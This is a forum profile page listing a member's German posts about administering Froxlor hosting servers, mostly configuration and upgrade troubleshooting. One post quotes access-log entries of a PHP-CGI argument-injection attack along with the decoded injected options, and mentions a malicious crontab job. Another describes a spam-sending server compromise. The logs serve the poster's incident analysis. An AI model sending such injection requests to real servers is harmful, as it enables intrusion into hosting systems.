Jump to content
Froxlor Forum

ometiclan

Members
  • Content Count

    20
  • Joined

  • Last visited

  • Days Won

    1

ometiclan last won the day on March 18 2014

ometiclan had the most liked content!

Community Reputation

1 Neutral

About ometiclan

  • Rank
    Froxie
  1. Na, da bin ich aber auch ein blindes Hühnchen. Also werd ich in Zukunft zuerst Froxlor und dann erst den FPM installieren...
  2. Groovy. Reingewurstelt und funktioniert schon. Danke für das schnelle Servce! Und ohne undankbar sein zu wollen, raunz ich gleich weiter: Ich hab php-fpm laufen. In der 10_froxlor_ipandport_X.X.X.X.80.conf findet sich fastcgi_pass 127.0.0.1:8888; was von Einstellungen -> Webserver-Einstellungen -> Nginx-PHP-Backend übernommen wird. Auch wenn dort steht "*NICHT relevant bei php-fpm" Das führt bei mir dann beim Aufruf von X.X.X.X./froxlor zu einem 502 Bad Gateway. connect() failed (111: Connection refused) while connecting to upstream Ich kann natürlich den Parameter in der Config editieren und dann froxlor auch aufrufen, aber: soll das so sein? Oder hab ich was übersehen? (Die Serverblöcke passen/funktionieren: fastcgi_pass unix:/var/run/david-leela.pi-php-fpm.socket;)
  3. Hallo Welt! Ich hab mir zum Testen hier lokal ein Pi mit Jessie und nginx aufgesetzt und mir dazu froxlor installiert. Die nginx schreit allerdings nach dem Anlegen eines vHosts / Serverblocks durch froxlor beim starten, weil sie laut config file /etc/nginx/acme.conf includen soll, die Datei aber nicht existiert. Habe ich irgendwas beim Setup übersehen/vergessen?
  4. Works without any issues (Jessie). Thank you.
  5. Das hab ich mir schon gedacht. Danke f?r die Info. Ich schummel einfach per Subdomain und Symlink.
  6. Hallo Welt! Beim Aufruf des phpmyadmins (1.2.3.4/phpmyadmin)kommt nur Quellcode daher. Offensichtlich wei? der Apache nicht, was er mit der index.php anfangen soll, ich bin aber zu bl?d ums richtig zu konfigurieren. Der Server ist frisch aufgesetzt, hab Froxlor gerade installiert, php-fpm l?uft, funktioniert auch alles. Leg' ich einen Symlink zum myadmin ins froxlor-Verzeichnis(1.2.3.4/froxlor/phpmyadmin), funktioniert alles wie gew?nscht. Ich hab mit php-fpm bis jetzt noch nie gearbeitet und die Seiten, die ich so rausgekramt habe aus dem Netz beziehen sich alle auch myadmin/nginx-Installationen. Fehlt mir die config f?r den myadmin im apche2/sites-enabled/*** oder habe ich im Froxlor etwas vergessen?
  7. Hallo Welt! Frox schmei?t mir einen Error: PHP warning/error #2 preg_match(): Compilation failed: internal error: previously-checked referenced subpattern not found at offset 728 /var/www/froxlor/lib/classes/phpmailer/class.PHPMailer.php:916 Mein letztes upgrade von heute, vorher war der noch nicht da (IMHO): spock:~# cat /var/log/dpkg.log | grep upgrade 2015-06-01 13:38:42 upgrade libpq5:amd64 9.1.16-0+deb7u1 9.1.16-0+deb7u2 2015-06-15 12:39:04 upgrade libssl1.0.0:amd64 1.0.1e-2+deb7u16 1.0.1e-2+deb7u17 2015-06-15 12:39:05 upgrade libsqlite3-0:amd64 3.7.13-1+deb7u1 3.7.13-1+deb7u2 2015-06-15 12:39:05 upgrade openssl:amd64 1.0.1e-2+deb7u16 1.0.1e-2+deb7u17 Evtl. kann da mal jemand nachbohren wenn Zeit
  8. Gutgut, nicht gleich mit dem Patchkabel peitschen. Ich wollts nur anmerken
  9. Morgen Welt! Hab grad mein kleines Shuttle ausgegraben um Jessie anzutesten, Froxlor installiert, geh ich auf http://192.168.1.179/froxlor/kommt mir da kein Froxlor daher. "Komisch" denkt sich der Pseudo-Admin und schaut nach... steht doch in der 000-default.conf des Indianers jetzt <VirtualHost *:80> ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> und deshalb kommt auch kein /var/www/froxlor daher und der http://192.168.1.179/froxlor/-Aufrufscheitert daher. Also entweder geh?rt das DocRoot ge?ndert, oder da fehlt mir ein SymLink im /html um froxlor zu finden. Ich bin mir sicher, das ist nicht so beabsichtigt in der 0815-DummyUser-Standardinstallation? Edit: Auf meinem Wheezy/Apache 2.2.22 ist das DocRoot /var/www.
  10. Geclam't hab ich schon. Hat aber au?er den obligatorischen Viren und W?rmern in div. Spam-Mails nichts gefunden. Yep, den Crontab (*/15 * * * * /var/tmp/zJGceOeuK >/dev/null 2>&1) hab ich erwischt. Die Mails lagen eben nicht in meinem Queue, sonst w?rs einfacher gewesen. (wie oben geschrieben: "Per PHP scheint das auch nicht zu laufen, phpmail.log (mail.add_x_header / mail.log) ist clean.") Aber fyi, sofern es jemanden interessiert, nach n?herem betrachten meiner vhosts-Logs und dem Lesen einiger Berichte von Leuten mit dem selben Problem wie ich, stach mir folgendes ins Auge: 80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php5?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" 80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" 80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" 80.73.9.164 - - [06/Apr/2015:02:36:40 +0200] "POST /cgi-bin/php4?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1" 503 1622 "-" "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25" ...was dann durch http://meyerweb.com/eric/tools/dencoder/sich so ?bersetzte: -d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n ... da das in einer yii-Basisinstallation war, die www-data geh?rte... B?M.
  11. Hallo Welt! Ich habe prim?r ein Linux-Problem, vermutlich nicht Froxlor-bezogen. Sofern jemand einen Hinweis hat, w?re ich trotzdem Amazonwishlist-Dankbar... Folgende Sitaution: User mit Wordpress-Installation, ?bernommen von anderem Server (1: copy inkl. DB). Sp?ter stellt sich heraus, Template vom Wordpress l?dt ein "alternatives" jQuery nach, welches Besucher auf russische Seiten weiterleitet. Gel?scht, gelacht, gut so. Das war es aber noch nicht, drei Tage sp?ter kommen die ersten Abuse-Meldungen. Offenbar hatte der USer die glorreiche Idee seine Cache und Upload Directories auf 777 zu chmoden und das Wordpress-Template war auch noch nicht so richtig sauber. Nach einigen base64 dekodierungen alle m?glichen Spamscripts gefunden, postqueue gel?scht etc. Konsequenz: rm -R Userfolder. Jetzt aber wirds dann interessant, denn der Spam hat nicht aufgeh?rt. Spamcop + GMX berichten von Spam, der von diesem Server gekommen sein soll. [ SpamCop V4.8.2.018 ] This message is brief for your comfort. Please use links below for details. Email from 85.25.195.7 / Tue, 14 Apr 2015 17:11:52 -0400 https://www.spamcop.net/w3m?i=z6294233036z971cfd0db37b574fbfcd5b4835d39ac8z [ Offending message ] Return-Path: <dow@quingroup.com> Received: from mx-austrian.atl.sa.earthlink.net ([207.69.195.31]) by mdl-increase.atl.sa.earthlink.net (EarthLink SMTP Server) with SMTP id 1yI87D7rm3Nl36Z0; Tue, 14 Apr 2015 17:11:53 -0400 (EDT) Received: from spock.bigbytes.at ([85.25.195.7]) by mx-austrian.atl.sa.earthlink.net (EarthLink SMTP Server) with SMTP id 1yI87C6Av3Nl34j0 for <x>; Tue, 14 Apr 2015 17:11:52 -0400 (EDT) Subject: Kwestcott For precepts over dignified ;-) Content-Type: text/html; charset=UTF-8 Confident-Conquer-Tartness: cf5d273d Handles-Identification-Nondeterminacy: 4cd294e9acb Cranny-Backstop-Breast: slowly Content-Transfer-Encoding: 7bit From: Julie <dow@quingroup.com> MIME-Version: 1.0 To: x Date: Tue, 14 Apr 2015 23:11:53 +0000 Utilizing-Asiatics: 8a542a7f53 Message-ID: <5af3_____________________________a31c@quingroup.com> X-ELNK-Received-Info: spv=1; X-ELNK-AV: 0 <html> (Blabla hab ich rausgeschnitten) </html> - Der Server ist kein Open Relay. - Die Mail Logs sind clean, es l?uft also nicht ?ber den Mailserver. - Per PHP scheint das auch nicht zu laufen, phpmail.log (mail.add_x_header / mail.log) ist clean. - root scheint sicher, keine Auff?ligkeiten in den Logs, ChkrootKit, rkhunter etc. zeigen auch nix Also was bleibt? Ich schau mit die laufenden Prozesse an und sehe: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND www-data 1186 7.2 0.0 35776 8700 ? Rs Apr06 1044:28 httpd www-data 21653 6.8 0.0 36048 7188 ? Ss Mar27 1980:16 httpd www-data 8241 1.7 0.0 333700 24112 ? S 17:28 0:00 /usr/sbin/apache2 www-data 8233 1.6 0.0 334668 31184 ? S 17:28 0:00 /usr/sbin/apache2 Die beiden www-data an erster und zweiter stelle sind mir dann doch ein wenig verd?chtig vorgekommen. Vor allem bei der CPU-Auslastung... Prozesse gekillt, einmal gro?es FuckIt und reboot. Derzeit scheint wieder Ruhe eingekehrt zu sein. Beim durchsehen der /customers f?llt mir auf, dass einige Ordner www-data als Besitzer und Gruppe haben. Eindeutig mein Fehler, hab ich nicht darauf geachtet und inzwischen jedem das zugeordnet, was ihm geh?rt. Meine Frage: WTF ist hier passiert? Und WTF hab ich hier falsch gemacht? Ich bin kein blutiger Anf?nger, aber das ?berfordert mich jetzt dann schon gewaltig, weil ich derzeit nicht mal verstehe, was passiert, geschweige denn wie ich es in Zukunft verhindern kann...
  12. Hallo Welt/d00p! Gerade auf 0.9.32 upgegraded auf meinem Debian, kleinen PHP-Error bekommen beim ersten Login beim Web-Interface: PHP warning/error #8 Undefined index: cron_backup /var/www/froxlor/lib/functions/froxlor/function.CronjobFunctions.php:33 plus ein paar kaputte Styles. Nach der ausgef?hrten "Froxlor Aktualisierung" schaut alles wieder in Ordnung aus. Wollte ich nur anmerken. Danke f?r das Update!
  13. Dann sollten diese Personen, deren Kunden (!) Froxlor nutzen vielleicht einfach Froxlor nicht als kostenloses St?ck Software hinnehmen, sondern einfach mal ein paar Scheine in die Hand nehmen und daf?r bezahlen? Wenn du umfangreiche Features willst, kann ich dir Plesk sehr ans Herz legen. Super Teil, wahnsinnig umfangreich. 40 Euro pro Monat. Pro Monat. Froxlor hat mich bis jetzt eine BluRay f?r freundlichen Support gekostet. Und dich? Also was man sich als Gratis-Entwickler oft anh?ren muss, da trau ich mich ja schon gar nicht mehr um Support zu fragen. Und da wundern sich die Leute, dass es bei OpenSource-Geschichten so oft ins Leere l?uft...
×
×
  • Create New...